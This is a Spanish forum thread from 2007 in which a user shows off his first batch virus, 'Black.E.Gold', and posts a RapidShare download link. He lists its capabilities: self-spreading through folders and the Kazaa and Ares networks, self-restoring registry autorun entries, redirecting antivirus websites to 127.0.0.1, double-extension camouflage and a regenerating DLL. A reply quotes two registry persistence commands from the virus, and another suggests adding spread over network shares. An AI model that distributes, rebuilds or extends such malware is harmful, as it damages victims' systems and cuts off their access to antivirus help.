elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
24 Mayo 2012, 17:07  


Tema destacado: [Overclocking] Récords de overclock del foro

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  Que les Parece?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Que les Parece?  (Leído 837 veces)
TheBlackBox

Desconectado Desconectado

Mensajes: 25


Nunca Me Subestimes


Ver Perfil
Que les Parece?
« en: 2 Octubre 2007, 00:04 »

Este fue una pequeña aplicacion maligana que diseñe:

Me dio mucho trabajo entender los codigos, organizarlos , ordenarlos y codearlos de forma correcta a fin de uqe me quedara lo mejor posible.

Al principio no quise publicarlo ya que esta "aplicacion" esta en formato batch y de que no tendria una originalidad ya que cualquiera puede copiarlos y modificarlos a su antojo, pero ya no hace falte mi amigo dominicano me convencio y aunque es mi primer virus creo que lo eh echo bien.

Espero sus comentarios.

Caracteristicas:

1. Se esparce en cualquier carpeta del sistema.
2. Se duplica apx. 78 por dia
3.Se instala en la carpeta windos
4.Hace cuatro entradas de registro para autoejecutarse al inicio del sistema las cual se reescribesn en caso de ser borradas.
5.Se adhiere al archivo win ini y al proceso explorer.exe
6.Tiene un codigo anti stealth integrado el cual asesina la ip por defecto 127.0.0.1 de casi todas las paginas principales de los antivirus haciendote la vida imposible al navegar.
7.Lanza un mesaje falso a su ejecucion.
8.Crea archivos de doble extension y scripts para camuflarse en tu sistema.
9.Se esparce en kazaa y ares
10. Mata el proceso explorer.exe y iexplorer.exe tras su ejecucion.
11.Crea un archivo madre .dll el cual se mantiene siempre en uso y aunque borres todas las copias del virus este se encargara de seguirlo generarlo.

Tengan Mucho Cuidado tuve que formatear la maquina una ves cuando lo estaba probando. Desde que le das dos clics ya no hay vuelta atras.

Aqui esta el link:
Black.E.Gold

http://rapidshare.com/files/59610922/Black.E.Gold.bat
En línea

Freeze.


Desconectado Desconectado

Mensajes: 2.731



Ver Perfil WWW
Re: Que les Parece?
« Respuesta #1 en: 2 Octubre 2007, 00:07 »

1- Podrias empezar con distraer un poco mientras se ejecuta.! :¬¬ :¬¬ :¬¬

2- Tube que reinciar mi PC :-( :-( :( :o :o :-\ :-\ Virtual  :xD :xD :xD :xD

3- Y si te esperas un poco mas, te saco la cura ;) ;) ;)
« Última modificación: 2 Octubre 2007, 00:13 por -Freeze- » En línea

Rozor

Desconectado Desconectado

Mensajes: 269


As I Walk Through The Valley Of The Shadow Of Dead


Ver Perfil WWW
Re: Que les Parece?
« Respuesta #2 en: 2 Octubre 2007, 00:27 »

Código:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v html /t REG_SZ /d "%windir%\%x%.bat" /f > nul
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /v BlackE.Gold /t REG_SZ /d "%windir%\%a%.bat" /f > nul

reg del

En línea

out in the streets they call it murder....
Homongus

Desconectado Desconectado

Mensajes: 77



Ver Perfil
Re: Que les Parece?
« Respuesta #3 en: 2 Octubre 2007, 23:54 »

¿Y si le agregases un medio de propagación por carpetas de red?. No quedaría nada mal.
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Que os parece? Corsair Cooling Hydro Series H50
Hardware
[A]ru 3 1,549 Último mensaje 18 Diciembre 2010, 19:34
por [A]ru
que os parece?
Diseño Gráfico
тαптяαпсє 14 4,094 Último mensaje 24 Septiembre 2011, 20:12
por Sk9ITk5Z
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines